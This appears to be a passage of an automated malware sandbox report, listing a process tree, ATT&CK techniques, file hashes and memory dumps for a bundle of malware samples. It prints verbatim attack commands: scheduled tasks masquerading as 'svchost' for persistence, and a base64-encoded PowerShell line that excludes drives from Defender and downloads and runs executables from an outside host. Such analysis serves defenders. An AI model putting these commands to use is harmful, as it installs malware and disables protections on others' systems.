    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:672
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2412
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:564
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2508
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
    3⤵
    PID:2760
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1756
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
    3⤵
    PID:2636
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2716
- C:\Users\Admin\AppData\Local\Temp\levislocker.exe
  "C:\Users\Admin\AppData\Local\Temp\levislocker.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1808
- C:\Users\Admin\AppData\Local\Temp\malecus.exe
  "C:\Users\Admin\AppData\Local\Temp\malecus.exe"
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of AdjustPrivilegeToken
  PID:2700
- C:\Users\Admin\AppData\Local\Temp\evil.exe
  "C:\Users\Admin\AppData\Local\Temp\evil.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2424
- C:\Users\Admin\AppData\Local\Temp\Solaris.exe
  "C:\Users\Admin\AppData\Local\Temp\Solaris.exe"
  2⤵
  - Executes dropped EXE
  PID:2024
- C:\Users\Admin\AppData\Local\Temp\TEST.exe
  "C:\Users\Admin\AppData\Local\Temp\TEST.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2996
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1738.tmp.bat""
    3⤵
    - Loads dropped DLL
    PID:1268
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:2312
  - - C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe
      "C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1740
- C:\Users\Admin\AppData\Local\Temp\ss.exe
  "C:\Users\Admin\AppData\Local\Temp\ss.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2932
- C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe
  "C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2144
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAYQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBlAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQBqAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBzAHcAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAHAAZABiACcALAAgADwAIwB4AG4AaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAZgB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAdQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFkAbwB1AHQAdQBiAGUALQBWAGkAZQB3AGUAcgBzAC4AcABkAGIAJwApACkAPAAjAGYAdABsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAHgAbQBsACcALAAgADwAIwBhAGsAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAagBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAegBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AeABtAGwAJwApACkAPAAjAHEAYwByACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAGQAbABsACcALAAgADwAIwB2AHgAdgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZQBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAdQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AZABsAGwAJwApACkAPAAjAGEAaABiACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlAC4AYwBvAG4AZgBpAGcAJwAsACAAPAAjAGoAZgB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwBhAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBwAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAuAGMAbwBuAGYAaQBnACcAKQApADwAIwB0AHoAYwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwBsAC8AWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACwAIAA8ACMAZQBrAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHMAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AGgAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQApADwAIwBxAGYAaQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcALAAgADwAIwBmAHQAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHAAdgB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGQAYQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApACkAPAAjAHEAYgB4ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAC8AVgBDAF8AcgBlAGQAaQBzAHQAeAA2ADQALgBlAHgAZQAnACwAIAA8ACMAcQB0AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAGUAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAG4AcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEMAXwByAGUAZABpAHMAdAB4ADYANAAuAGUAeABlACcAKQApADwAIwBjAHQAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB5AGIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgB4AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACkAPAAjAHoAegBjACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHQAdAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAHYAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZwBjAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegB5AHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAeAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFYAQwBfAHIAZQBkAGkAcwB0AHgANgA0AC4AZQB4AGUAJwApADwAIwBnAHUAZwAjAD4A"
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe

Filesize
233KB

MD5
4ef3177a2e94ce3d15ae9490a73a2212

SHA1
a34f47568ce7fcea97a002eebeae385efa98790c

SHA256
87353d18dfdebf4d0747bbf21d58adaed2b04060d61cba3fa052d522640520f0

SHA512
635ce5c0d1b9f7dd5d7b4c00f216af06dc7d818132ba87a57d3d54f6b30ee01f64430d2aa265f60027cc58dc2e738d5b674ee36ffdca34ff540ce44b7da7c502

Download Submit
C:\Users\Admin\AppData\Local\Temp\BlueScreen.exe

Filesize
9KB

MD5
b01ee228c4a61a5c06b01160790f9f7c

SHA1
e7cc238b6767401f6e3018d3f0acfe6d207450f8

SHA256
14e6ac84d824c0cf6ea8ebb5b3be10f8893449474096e59ff0fd878d49d0c160

SHA512
c849231c19590e61fbf15847af5062f817247f2bcd476700f1e1fa52dcafa5f0417cc01906b44c890be8cef9347e3c8f6b1594d750b1cebdd6a71256fed79140

Download Submit
C:\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe

Filesize
1.8MB

MD5
55677d2f4f251b558660652002933369

SHA1
804357acd8e75f6a8db9b907a8df882e8588b6bd

SHA256
f714fb12a601649f1e0840a75265337c77683ec64a599f0631d2ba512bcee5f5

SHA512
12343e2ede7dc8534a4682a007ca67b34c287d4e1f7d3565d31860d72d643ad9923b59953571e95c404a9b2951e6bdd4e6e6584f246852f02f53bd832d0bc119

Download Submit
C:\Users\Admin\AppData\Local\Temp\TEST.exe

Filesize
37KB

MD5
ca70b79092c1b1e6dc8eb7950864b0ee

SHA1
3396cebc62c348fc96463a73a40eb4e5e6bc09c5

SHA256
2ce66bab757ad6cbee699be5ad711582d837f3e0b216d70cdb933c4c9415b20b

SHA512
9eb6c13096de168c46d8c2dd78ce28a19dd4f0aadded4fcf6b9ed655faac43747f7eb7123f664c8e44d77aaf1c6948ec6072a9d63b98ec69e104a7bbb97ebe34

Download Submit
C:\Users\Admin\AppData\Local\Temp\celleslim\farve\pitiableness\Guldtand.Spi168

Filesize
67KB

MD5
ed10995a048cad2427dcf3d647fe0358

SHA1
f8bf2952b94dfb4aa36cf70fa982f2177197e485

SHA256
2e42395d6ab6687f6e6881851a4eec7bc97baac18a8fe5509b9c6379fda06659

SHA512
934e6424512e130f5d2977d7639c732b1c3618e27303dc34411e5cf0da7b72f4253f394ec588807585276e39a20c9cca896d29f93866a8c4ffaa35d14e0d64fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\colorful screen darkener.exe

Filesize
9KB

MD5
757c3888ff96ebc33c2be55f648b8446

SHA1
4be04b6713b83d5e6fb48620a11629a1735dc273

SHA256
73d673b3175a1dc7e77b01537a6de77d1f78c9afc063eab263fd0c24848feb93

SHA512
421d6dcaf8031565fd5eb9a11bd167f9bc198e8622386dcba81354800eb13d533f045c0ae29de05d0d275bba151b5a932aa70f2c5e8b3c073e16170ec2b3e840

Download Submit
C:\Users\Admin\AppData\Local\Temp\concos_1.6.exe

Filesize
15KB

MD5
eed739fea0bc483844ddf8ddcce053d0

SHA1
06e3c942854aa1651069d99279f7f61f7dd6470d

SHA256
72b8b1fb511bbc8c3d883a1b6fa0ad55a731bda7585ab1f5670ab6a5d7a36225

SHA512
0c6621efca8b6b23e10ea6e6db6e7bc16596fb2bed72b703d460ac8b2deb388d6fae9bc8a47a139ab08349546b7c743cd7097aea21c55d469f45a655fb4c32b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\evil.exe

Filesize
23KB

MD5
0e0d73422110762ad112c39647865d09

SHA1
4bb94e94e65a8bc12313783df99b96d89d7fd764

SHA256
02ac6f6f2eff68b25be9ec044a2af027fbc915af3053f647086f68ad8d6c2e30

SHA512
e31a21c42c7bcdeb8dd80418fad12d5dc8486e21b609f5636114021fbcadb989ca7a612c0300ebb235c5f7a167a60541125409bd959442116407f48808742607

Download Submit
C:\Users\Admin\AppData\Local\Temp\javawvd.exe

Filesize
36KB

MD5
bb13e4ebdcb3e7d6bcd78601fd01b654

SHA1
4165ceda368602fb21495c55a95548b7056f4413

SHA256
55385f8be83a7e193390aa5c3a9a9934e603d6d3d164e5f496ece0ad553e9027

SHA512
48ad4c2e17a7eea58c9c8ca47a68e129f889c117ddcdfffb12cf478f4b40223df1b923367309898de219a2dc7b4e95f470f7297c1d60913c59c8acb4db6f50e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1738.tmp.bat

Filesize
170B

MD5
f708a079b40f7a7e259fc0e1cc4666ba

SHA1
270017eb1945376660312cfb52fa732c395cdd51

SHA256
611d19c21608ce1f6f12eb11a0c62b79ceb263d54fa429c696525d70f05b9442

SHA512
c4ee8bbad750815c973c79a3cce20aaf5c3856a59c059b703018158f01e3f71d401adcc47f85606fcb929c32c40ab9453a25c834d29c646aa58a9ce4e81233fc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WHYIBS5AOPDZLEIROINV.temp

Filesize
7KB

MD5
677db3acfd602421c9e2ec15b7a84c86

SHA1
16282a5c0a81d32a97b2ebc5aef941041056bbfd

SHA256
c8c95202c3ec48a09057b5b520f511b52ef32817eb8c8874f6ed3245e878717a

SHA512
38681ec8f502abbd5bb2539a4bd923f3b6ca338c8867cef05b02eed1cd4238cab634a1d18e2c9ea5ae77b5a0675a7f107ceb4d0d184a31e5ff5fb15d13480aca

Download Submit
C:\Windows\xdwd.dll

Filesize
136KB

MD5
16e5a492c9c6ae34c59683be9c51fa31

SHA1
97031b41f5c56f371c28ae0d62a2df7d585adaba

SHA256
35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

SHA512
20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

Download Submit
\Users\Admin\AppData\Local\Temp\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe

Filesize
568KB

MD5
4448a3c2ddfdda45009b440faa39a5fe

SHA1
b16a26331d6ebe8f4a45b43e8b0251a715139b10

SHA256
70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2

SHA512
094cef6184c29430be5e4536b54cdfa632b52e7e09c7a4c04104d1b533113f6de6190d6525aac84ddba631220ee0b33a047272b952765977df336a5fa72425b0

Download Submit
\Users\Admin\AppData\Local\Temp\7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b.bin.sample.exe

Filesize
65KB

MD5
694efccf0c905305f5c8418499fe335c

SHA1
1fa42976df8d8b1848ac2d99468da3c17785d285

SHA256
7f3bfd0cc61218f8b5bff0850eb3cc9d5eadd7e735f9c0faf1224972c99e253b

SHA512
294fecfb3abb91a9a61001b26acced7a1cc99abb0a140a8bc352b51794e3750b7579b44543d1afde676c0e75ddc6c80c44eb49b959946654bc5f88e0d2b49fcb

Download Submit
\Users\Admin\AppData\Local\Temp\CirnoBackdoorLOL.exe

Filesize
1.6MB

MD5
a42d640eb78c5d5b867abef05e5231d6

SHA1
0b1068a2b47798feb89b917ff4297ab0328c4296

SHA256
73d8301c93c887eedd6777610a37a2b7484ab6b2555b19d241480483324b1952

SHA512
21c3c444db9c20d2faabee48040e06cfb2ff2941151b1a4e004a0e02c48b9fe8de69b0072365395d0bc65433f126e1fb20c10e7d1526192c281c377011f07ae8

Download Submit
\Users\Admin\AppData\Local\Temp\Client.exe

Filesize
100KB

MD5
21560cb75b809cf46626556cd5fbe3ab

SHA1
f2eec01d42a301c3caacd41cddb0ef2284dbb5a6

SHA256
d2525bab5cb322933c8978880975e0c189feece68ae3f1951bf46297c7f640fa

SHA512
21eac0037b16f968ee8743b52dc73efdd34d24c2502d090b399a552dc6cb75f7d3090c10d448c66b868b1c4a7c46a5068b084b88b487e40b1e755356cb7557db

Download Submit
\Users\Admin\AppData\Local\Temp\Solaris.exe

Filesize
47KB

MD5
05859c4616d5d3de2927122b4d5303b9

SHA1
7ebef99aedeb8a54fe3c70424282e462df954ef6

SHA256
af51004a01329780e0cf6c04a389de96163e61aa004833cff7d59abef2a053a6

SHA512
d73f6b8a9313a727931135107f800e8885d0e471aaccf1461928a50c6c2a4e2921a1ae6eff8a2a1755656af3cb380782a7e0744573bc29691d0e964c32920d15

Download Submit
\Users\Admin\AppData\Local\Temp\YT_Bot.exe

Filesize
2.4MB

MD5
240b2940002c38ebb3df80246920a729

SHA1
ecb8fcaf0babe0f000b5f7cceadfb9bc033d0467

SHA256
552a0e05f9fe148b38b8cd34f4dc699654feb0fb98584d5506001742a4d4bb0d

SHA512
d5448e5b3507ac5008ca405c90e7fec49f4594b919677cf4bbe9cd7faabda1ef02713b9a88bf69bc9f21bf986ba9411929e7f2f17cacc083e7af046f037297d1

Download Submit
\Users\Admin\AppData\Local\Temp\cleansaturn.exe

Filesize
3.8MB

MD5
0f597e254135a708137a52470943316c

SHA1
86240613459d76fff43d9995f73c97f75ee680c1

SHA256
8763150d50e887141961f8c027acf92d5698e8e925cc5e76515d6d8fe330cb26

SHA512
408fe3bd85921cdf5576caa55e28213849c07340817c33605a68fa3da72ae512c0ac710b3a3cb4cbff44c5f64cfb0715034604a5de7bf9c5b6adce4919a2f6eb

Download Submit
\Users\Admin\AppData\Local\Temp\error.exe

Filesize
10KB

MD5
bcdc1a6f1805a6130dfd1913b1659bc2

SHA1
f4b80ac7fe17332f916ce450d29f7ce671e49bb0

SHA256
78e706c684da0134ace5fdd5cc5e7263c5f17b905d783f928eb68d558116aac6

SHA512
0769ecf207e224ceceba33854b457d4389897163037b91141b958762304f64e75af32679c4d6ea88c4cf02aaadde077fef048837ef280a13948e82d69b6358b4

Download Submit
\Users\Admin\AppData\Local\Temp\levislocker.exe

Filesize
914KB

MD5
f20c3ceba1ac2530208c3e7b9f954286

SHA1
8bae89f6d3b8376048643397408e63942fd66f27

SHA256
ef2dfff6121e80e3fa88f86da7941f3e9a613f1ed43188be1d8df0a9b39c33cd

SHA512
8a7a63da9ac92469f8c2f1114693777e46836a6e2caeca255c21d49c385af58dad7f43264c14cc62aa65affbe0b2e528a9989129cc476b1d7d5c44c80616202c

Download Submit
\Users\Admin\AppData\Local\Temp\malecus.exe

Filesize
15KB

MD5
0e741eb3f92a7a739628d04a5fd4aab9

SHA1
87a8865773a791ab3ca68201cee7a0c3fef2fab3

SHA256
1ef41bb945daf62e1a7098b1f9b684e54cb1ac5fbbadf1f49e5a87b1788b9f85

SHA512
1377611e60d25eb456f5d5c911fe16c7d655b7930a8475e7d164d0c536740d286c7c27bcedd191c266c3085f6570892a975fddaee9a9ab3ca4b598b53350283c

Download Submit
\Users\Admin\AppData\Local\Temp\ss.exe

Filesize
202KB

MD5
e61bc4ecaac4354b240d56fa48c67790

SHA1
c8c83c518188d7adf2a2a485b20e033a6f8a0602

SHA256
4f4732e54644b08be1c2ac9851fb21c947570d674083e9f614f3cbeef3ccf1e6

SHA512
4bec8a6067b1aa9f2b25559c5bac61aa45b90619fb713432824e9e8bd2c06e4193acab18031c7df9eb643bc17b3aa0807b49ce790b13870248f8907ad89c6ccc

Download Submit
memory/564-609-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/564-515-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/672-517-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/672-481-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1020-419-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1020-385-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1268-482-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1268-519-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1516-417-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1516-345-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1600-418-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1600-346-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1604-387-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1604-379-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1688-483-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1696-414-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1696-380-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1740-550-0x000000013F630000-0x000000013F63E000-memory.dmp

Filesize
56KB

Download
memory/1740-607-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1756-552-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1808-193-0x0000000000960000-0x0000000000A4A000-memory.dmp

Filesize
936KB

Download
memory/1904-516-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1904-462-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1908-149-0x0000000000090000-0x00000000000B0000-memory.dmp

Filesize
128KB

Download
memory/1920-365-0x000007FEF6F90000-0x000007FEF6FB2000-memory.dmp

Filesize
136KB

Download
memory/1928-27-0x00000000009F0000-0x00000000009F9000-memory.dmp

Filesize
36KB

Download
memory/1928-28-0x00000000009F0000-0x00000000009F9000-memory.dmp

Filesize
36KB

Download
memory/1928-0-0x0000000074B71000-0x0000000074B72000-memory.dmp

Filesize
4KB

Download
memory/1928-55-0x0000000004A30000-0x0000000004ABA000-memory.dmp

Filesize
552KB

Download
memory/1928-160-0x000000000FB30000-0x000000001050E000-memory.dmp

Filesize
9.9MB

Download
memory/1928-78-0x00000000009F0000-0x00000000009FD000-memory.dmp

Filesize
52KB

Download
memory/1928-2-0x0000000074B70000-0x000000007511B000-memory.dmp

Filesize
5.7MB

Download
memory/1928-152-0x0000000074B70000-0x000000007511B000-memory.dmp

Filesize
5.7MB

Download
memory/1928-56-0x0000000004A30000-0x0000000004ABA000-memory.dmp

Filesize
552KB

Download
memory/1928-70-0x000000000FB30000-0x000000000FF1B000-memory.dmp

Filesize
3.9MB

Download
